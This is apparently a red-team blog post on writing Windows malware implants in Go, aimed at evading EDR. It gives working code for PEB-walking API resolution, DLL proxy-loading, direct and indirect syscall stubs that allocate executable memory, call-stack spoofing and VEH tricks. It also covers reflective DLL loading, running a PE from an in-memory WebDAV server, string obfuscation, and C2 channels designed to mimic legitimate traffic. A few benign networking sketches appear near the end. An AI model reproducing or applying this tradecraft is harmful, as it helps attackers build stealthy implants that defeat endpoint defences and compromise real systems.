# tl;dr
Golang is no C, but it's OK.
> **disclaimer:** This is a personal opinion. C-nile people please do not hurt me.
# why would anyone want to do that
This is debatable, but:
- C2 communication is *way* easier to do in Golang, which is why a lot of stage1 implants are Golang-based
- Hard*er* to reverse, but not as hard as it was before
- Loads of support and offensive projects (some referenced here)
- Loads of existing agents to customize/build off of (<3 `Merlin`)
- Faster to develop in sometimes (subjective)
I will only cover language-specific implementations. Any higher-level techniques stay the same and are out of scope for this post.
# API resolver
The default `sys/windows` package uses `LoadLibraryW` and `GetProcAddress` (oof). Walking the PEB is fairly easy in Go, and I have implemented an interchangeable interface for the `windows.NewLazySystemDLL` set of functions in https://github.com/zimnyaa/xdvoke. Just to compare it to C, this is how you resolve a function:
```go
func (dll *ProxyDLL) NewProc(name string) (*DProc, error) {
dosHeader := (*IMAGE_DOS_HEADER)(a2p(uintptr(dll.Handle)))
if dosHeader.E_magic != IMAGE_DOS_SIGNATURE {
return nil, fmt.Errorf("Not an MS-DOS binary (provided: %x, expected: %x)", dosHeader.E_magic, IMAGE_DOS_SIGNATURE)
}
oldHeader := (*IMAGE_NT_HEADERS)(a2p(uintptr(dll.Handle) + uintptr(dosHeader.E_lfanew)))
if oldHeader.Signature != IMAGE_NT_SIGNATURE {
return nil, fmt.Errorf("Not an NT binary (provided: %x, expected: %x)", oldHeader.Signature, IMAGE_NT_SIGNATURE)
}
directory := oldHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]
if directory.Size == 0 {
return nil, fmt.Errorf("No export table found")
}
exports := (*IMAGE_EXPORT_DIRECTORY)(a2p(oldHeader.OptionalHeader.ImageBase + uintptr(directory.VirtualAddress)))
if exports.NumberOfNames == 0 || exports.NumberOfFunctions == 0 {
return nil, fmt.Errorf("No functions exported")
}
if exports.NumberOfNames == 0 {
return nil, fmt.Errorf("No functions exported by name")
}
var nameRefs []uint32
unsafeSlice(unsafe.Pointer(&nameRefs), a2p(oldHeader.OptionalHeader.ImageBase+uintptr(exports.AddressOfNames)), int(exports.NumberOfNames))
var ordinals []uint16
unsafeSlice(unsafe.Pointer(&ordinals), a2p(oldHeader.OptionalHeader.ImageBase+uintptr(exports.AddressOfNameOrdinals)), int(exports.NumberOfNames))
for i := range nameRefs {
nameArray := windows.BytePtrToString((*byte)(a2p(oldHeader.OptionalHeader.ImageBase + uintptr(nameRefs[i]))))
if nameArray == name {
nameord := ordinals[i]
funcaddr := oldHeader.OptionalHeader.ImageBase + uintptr(*(*uint32)(a2p(oldHeader.OptionalHeader.ImageBase + uintptr(exports.AddressOfFunctions) + uintptr(nameord)*4)))
return &DProc{dll, name, funcaddr}, nil
}
}
return nil, fmt.Errorf("Function not found")
}
```
As a cherry on top, I have stolen the approach from rad98 (used by a lot of people) to proxy-load the DLL:
```go
modntdll, _ := NewProxyDLL("ntdll.dll")
modkernel32, _ := NewProxyDLL("kernel32.dll")
fRtlQueueWorkItem, _ := modntdll.NewProc("RtlQueueWorkItem")
fLoadLibraryW, _ := modkernel32.NewProc("LoadLibraryW")
syscall.Syscall(fRtlQueueWorkItem.Addr(), 3, uintptr(fLoadLibraryW.Addr()), uintptr(unsafe.Pointer(namep)), uintptr(0))
time.Sleep(500 * time.Millisecond)
rdll, e := windows.LoadDLL(name)
```
Omit it if you want, because Elastic checks the call stack for LoadLibrary and has a rule against `RtlQueueWorkItem` usage. It shouldn't take long for other EDRs to follow suit.
# (in)direct syscalls
Syscalls are a staple primitive of doing anything lower-level within an implant. Direct syscall implementations are usually based on assembly stubs in the Go runtime, mainly because Golang's assembly is cryptic and way easier to modify than to write from scratch.
The industry-standard implementation is https://github.com/C-Sto/BananaPhone/, which is a Hell's Gate resolver and a syscall stub. Hell's Gate is extensively covered in a lot of places, but the syscall stub is more interesting, as it demonstrates how to adapt regular assembly to Golang:
```go
//func Syscall(callid uint16, argh ...uintptr) (uint32, error)
TEXT ·bpSyscall(SB), $0-56
XORQ AX,AX
MOVW callid+0(FP), AX
PUSHQ CX
//put variadic size into CX
MOVQ argh_len+16(FP),CX
//put variadic pointer into SI
MOVQ argh_base+8(FP),SI
// SetLastError(0).
MOVQ 0x30(GS), DI
MOVL $0, 0x68(DI)
SUBQ $(maxargs*8), SP // room for args
// Fast version, do not store args on the stack.
CMPL CX, $4
JLE loadregs
// Check we have enough room for args.
CMPL CX, $maxargs
JLE 2(PC)
INT $3 // not enough room -> crash
// Copy args to the stack.
MOVQ SP, DI
CLD
REP; MOVSQ
MOVQ SP, SI
loadregs:
//move the stack pointer????? why????
SUBQ $8, SP
// Load first 4 args into correspondent registers.
MOVQ 0(SI), CX
MOVQ 8(SI), DX
MOVQ 16(SI), R8
MOVQ 24(SI), R9
// Floating point arguments are passed in the XMM
// registers. Set them here in case any of the arguments
// are floating point values. For details see
// https://msdn.microsoft.com/en-us/library/zthk2dkh.aspx
MOVQ CX, X0
MOVQ DX, X1
MOVQ R8, X2
MOVQ R9, X3
//MOVW callid+0(FP), AX
MOVQ CX, R10
SYSCALL
ADDQ $((maxargs+1)*8), SP
// Return result.
POPQ CX
MOVL AX, errcode+32(FP)
RET
```
This is based off of https://golang.org/src/runtime/sys_windows_amd64.s, namely the `runtime·asmstdcall` function.
However, a direct syscall stub is something your grandpa uses to call his SSNs. Usually it is best to jump to an existing `syscall;ret`, known as indirect syscalls. There is an amazing Golang package that supports this out of the box, https://github.com/f1zm0/acheron/. Moreover, it also contains a built-in NTDLL API resolver in Golang assembly that even supports plug-in hashing functions. This is amazing:
```go
s1 := ach.HashString("NtAllocateVirtualMemory")
if retcode, err := ach.Syscall(
s1, // function name hash
hSelf, // arg1: _In_ HANDLE ProcessHandle,
uintptr(unsafe.Pointer(&baseAddr)), // arg2: _Inout_ PVOID *BaseAddress,
uintptr(unsafe.Pointer(nil)), // arg3: _In_ ULONG_PTR ZeroBits,
0x1000, // arg4: _Inout_ PSIZE_T RegionSize,
windows.MEM_COMMIT|windows.MEM_RESERVE, // arg5: _In_ ULONG AllocationType,
windows.PAGE_EXECUTE_READWRITE, // arg6: _In_ ULONG Protect
); err != nil {
panic(err)
}
```
# call stack spoofing
While VEH is tough to deal with, the approach from https://0xdarkvortex.dev/hiding-in-plainsight/ is still valid. It has its drawbacks, like the use of `TpAllocWork` getting signatured, but there are plenty of alternatives to schedule tasks in new threads, like the APC approach in https://github.com/zimnyaa/beepsyscall/tree/master
The gist of it is to create an assembly stub that will extract arguments from a given struct pointer and then directly jump to a syscall stub. By creating a task with the start address of that assembly stub, the syscall instruction is reached with a benign call stack that does not include any unbacked memory.
TL;DR for `beepsyscall`:
```
CreateThread (Beep+offset) ->
creates alertable waiting thread ->
QueueUserAPC(shellcode stub) ->
APC executes ->
Assembly unpacks register values from the struct ->
Assembly stub jumps to the syscall stub
```
# VEH and callback stubs
I was under the impression for a long time that Golang's runtime fucks over any Vectored Exception Handlers. However, as it turned out, only Golang-specific exceptions are caught, like division by zero, so this is still possible:
```go
func vehHandler(ep *exceptionpointers) uintptr {
fmt.Printf("ep: %+v\n", ep)
fmt.Printf("er: %+v\n", ep.record)
if ep.record.exceptioncode == _EXCEPTION_ACCESS_VIOLATION {
fmt.Printf("got _EXCEPTION_ACCESS_VIOLATION in a separate thread\n")
kernel32 := windows.NewLazySystemDLL("kernel32.dll")
exitt := kernel32.NewProc("ExitThread")
exitt.Call(uintptr(0))
return _EXCEPTION_CONTINUE_EXECUTION // never reached
}
return _EXCEPTION_CONTINUE_SEARCH
}
func main() {
kernel32 := windows.NewLazySystemDLL("kernel32.dll")
addveh := kernel32.NewProc("AddVectoredExceptionHandler")
vehcallback := syscall.NewCallback(vehHandler)
addveh.Call(uintptr(2), vehcallback)
go syscall.SyscallN(uintptr(0), uintptr(0))
time.Sleep(1 * time.Second)
fmt.Printf("main thread is alive, but the runtime is now fucked in unforeseeable ways")
}
```
Note the usage of `syscall.NewCallback`. This function returns an address of a trampoline that converts between the Windows and Golang ABI. This means that you can get a function pointer that makes a given Golang function stdcallable. This is immensely useful for callbacks, handlers, stomping, hooking and all kinds of fun things.
# reflective DLL loading
Use `Sliver`'s memmod fork: https://github.com/moloch--/memmod. Be aware that it uses the `windows` package, which means `GetProcAddress("VirtualAlloc")`. You can even go one step further and use [[bof-lazy-loading]] to reimplement the way BOFs are handled in that C2.
# webdav
If you need WebDAV locally, build off of `golang.org/x/net/webdav`. It is very easy to spin up a server for an in-memory file (this example runs a PE from WebDAV, which is actually useless for evasion):
```go
func main() {
myfs := webdav.NewMemFS()
emptyctx := context.TODO()
file, err := myfs.OpenFile(emptyctx, "mempe.exe", os.O_WRONLY|os.O_CREATE, 0755)
if err != nil {
panic(err)
}
if _, err := file.Write(exe); err != nil {
file.Close()
panic(err)
}
if err := file.Close(); err != nil {
panic(err)
}
handler := &webdav.Handler{
FileSystem: myfs,
LockSystem: webdav.NewMemLS(),
}
s := &http.Server{
Addr: ":8083",
Handler: handler,
}
go func() {
time.Sleep(1 * time.Second) // yeah I can't into concurrency B)
c := exec.Command(`\\192.168.0.140@8083\DavWWWRoot\mempe.exe`) // raw string keeps the UNC backslashes intact
c.Start()
time.Sleep(1 * time.Second)
s.Shutdown(emptyctx)
}()
s.ListenAndServe()
fmt.Println("stopped the WebDAV server.")
}
```
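The `time.Sleep` before the first request is only there to give `ListenAndServe` time to bind. A minimal sketch of an alternative, assuming nothing beyond the standard library: bind the listener synchronously with `net.Listen`, then hand it to `Serve` in a goroutine. The names `startServer` and `demo` are made up for illustration, and a plain `http.HandlerFunc` stands in for the `webdav.Handler` so the snippet has no external dependencies.

```go
package main

import (
	"context"
	"fmt"
	"io"
	"net"
	"net/http"
)

// startServer (hypothetical helper) binds the listener before returning,
// so the address is connectable as soon as the caller gets it back.
func startServer(h http.Handler) (*http.Server, string, error) {
	ln, err := net.Listen("tcp", "127.0.0.1:0") // port 0: let the OS pick a free port
	if err != nil {
		return nil, "", err
	}
	srv := &http.Server{Handler: h}
	go srv.Serve(ln) // returns http.ErrServerClosed once Shutdown is called
	return srv, ln.Addr().String(), nil
}

// demo starts a server, performs one request without sleeping, and shuts down.
func demo() (string, error) {
	h := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		io.WriteString(w, "ok")
	})
	srv, addr, err := startServer(h)
	if err != nil {
		return "", err
	}
	defer srv.Shutdown(context.Background())

	resp, err := http.Get("http://" + addr + "/")
	if err != nil {
		return "", err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	return string(body), err
}

func main() {
	body, err := demo()
	if err != nil {
		panic(err)
	}
	fmt.Println(body)
}
```

Because the socket is already listening when `startServer` returns, early connections queue in the kernel backlog until `Serve` picks them up, which removes the race the sleep was papering over.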
# networking and SOCKS
The main advantage of a Golang implant is the ease of networking. Implementing pivoting, (reverse) port forwarding, or SOCKS is much easier due to the way IO is handled in the language.
An example of how one might go about implementing reverse SOCKS over an implant that uses gRPC is provided at https://github.com/zimnyaa/grpcssh (this uses the Chisel approach to connection multiplexing -- establish an SSH connection over an arbitrary protocol and let the smart people do all the work).
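To illustrate what "the way IO is handled" buys you, here is a rough sketch of a plain TCP relay built on `io.Copy`. It is a generic standard-library example, not code from any of the projects mentioned above; `relay` and `demo` are hypothetical names, and the echo server only exists to make the snippet self-contained.

```go
package main

import (
	"fmt"
	"io"
	"net"
)

// relay accepts connections on ln and pipes each one to target.
// Every net.Conn is an io.Reader and io.Writer, so two io.Copy calls
// are all that is needed for a bidirectional forward.
func relay(ln net.Listener, target string) {
	for {
		client, err := ln.Accept()
		if err != nil {
			return // listener closed
		}
		go func() {
			defer client.Close()
			upstream, err := net.Dial("tcp", target)
			if err != nil {
				return
			}
			defer upstream.Close()
			go io.Copy(upstream, client) // client -> target
			io.Copy(client, upstream)    // target -> client
		}()
	}
}

// demo wires an echo server behind the relay and sends one message through it.
func demo() (string, error) {
	echo, err := net.Listen("tcp", "127.0.0.1:0")
	if err != nil {
		return "", err
	}
	defer echo.Close()
	go func() {
		for {
			c, err := echo.Accept()
			if err != nil {
				return
			}
			go func() { defer c.Close(); io.Copy(c, c) }()
		}
	}()

	front, err := net.Listen("tcp", "127.0.0.1:0")
	if err != nil {
		return "", err
	}
	defer front.Close()
	go relay(front, echo.Addr().String())

	conn, err := net.Dial("tcp", front.Addr().String())
	if err != nil {
		return "", err
	}
	defer conn.Close()
	if _, err := conn.Write([]byte("ping")); err != nil {
		return "", err
	}
	buf := make([]byte, 4)
	if _, err := io.ReadFull(conn, buf); err != nil {
		return "", err
	}
	return string(buf), nil
}

func main() {
	got, err := demo()
	if err != nil {
		panic(err)
	}
	fmt.Println(got)
}
```

The same two-`io.Copy` shape works for anything that satisfies `io.ReadWriter`, which is why multiplexing over an arbitrary transport is mostly a matter of plumbing.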
# static obfuscation
Garble (https://github.com/burrowers/garble/tree/master) is king. Beware of large strings though, and obfuscate them yourself with single-pass XOR or something.
Garble has an experimental control flow flattening mode, but it requires a bunch of tinkering to get it working.
Mangle (https://github.com/Tylous/Mangle) only removes known Go IoCs, which can be useful sometimes.
# implant size
Implant size is a pain, and what you see with `garble -tiny -literals build` is what you get. Sometimes you can cut down on it, but not by much.
Consider using stagers or file loaders to avoid having a 15 MB high-entropy blob.
# C2 communication
Anything is possible, as Golang is a language of servers and clients. Complex HTTP (`merlin`), gRPC over most anything (`sliver`), wireguard (as it is written in Go) are all viable options. If implemented correctly, networking will be blazing-fast as well. As Go is the perfect language for a teamserver, this further simplifies things by allowing you to reuse code/libraries both on the implant-side and the client-side.
In general, I would recommend making all C2 protocols implement `net.Conn`. After that, layering encryption and message transport over it becomes very simple and universal.
My way to implement this would be the following:
- C2 protocol that mimics legitimate traffic and a `net.Conn` interface over it (obfuscated HTTP/S, websockets, reliable UDP, VPNs like wireguard, WebRTC, public file sharing services, etc.)
- Intermediate encryption layer (mTLS or Noise Protocol Framework)
- Message layer (JSON, XML, protobuf, length-prefixed structs, etc.)
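As a rough sketch of why the `net.Conn` abstraction makes layering simple, the message layer below is a length-prefixed framer that only needs an `io.Reader`/`io.Writer`, so it does not care what transport sits underneath. The names `writeFrame`, `readFrame`, `maxFrame` and the 4-byte big-endian header are assumptions chosen for illustration, not a format taken from any tool mentioned here; `net.Pipe` stands in for a real transport.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
	"io"
	"net"
)

// maxFrame caps the payload size so a corrupt header cannot force a huge allocation.
const maxFrame = 1 << 20

// writeFrame sends a 4-byte big-endian length followed by the payload.
func writeFrame(w io.Writer, payload []byte) error {
	if len(payload) > maxFrame {
		return errors.New("frame too large")
	}
	var hdr [4]byte
	binary.BigEndian.PutUint32(hdr[:], uint32(len(payload)))
	if _, err := w.Write(hdr[:]); err != nil {
		return err
	}
	_, err := w.Write(payload)
	return err
}

// readFrame reads one length-prefixed message.
func readFrame(r io.Reader) ([]byte, error) {
	var hdr [4]byte
	if _, err := io.ReadFull(r, hdr[:]); err != nil {
		return nil, err
	}
	n := binary.BigEndian.Uint32(hdr[:])
	if n > maxFrame {
		return nil, errors.New("frame too large")
	}
	buf := make([]byte, n)
	_, err := io.ReadFull(r, buf)
	return buf, err
}

// demo sends one frame across an in-memory net.Conn pair.
func demo() (string, error) {
	a, b := net.Pipe() // synchronous in-memory net.Conn pair
	defer a.Close()
	defer b.Close()

	errc := make(chan error, 1)
	go func() { errc <- writeFrame(a, []byte("hello")) }()

	msg, err := readFrame(b)
	if err != nil {
		return "", err
	}
	if err := <-errc; err != nil {
		return "", err
	}
	return string(msg), nil
}

func main() {
	msg, err := demo()
	if err != nil {
		panic(err)
	}
	fmt.Println(msg)
}
```

The encryption layer slots in between without touching the framer: for example, `tls.Client` and `tls.Server` from `crypto/tls` both accept any `net.Conn` and return one, so the framing functions can be pointed at the wrapped connection unchanged.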
# everything else
Everything else should be pretty much the same. I advise taking a look at the source code for `runtime` and `sys/windows` for reference. This should cover most of the lower-level language-specific implementations.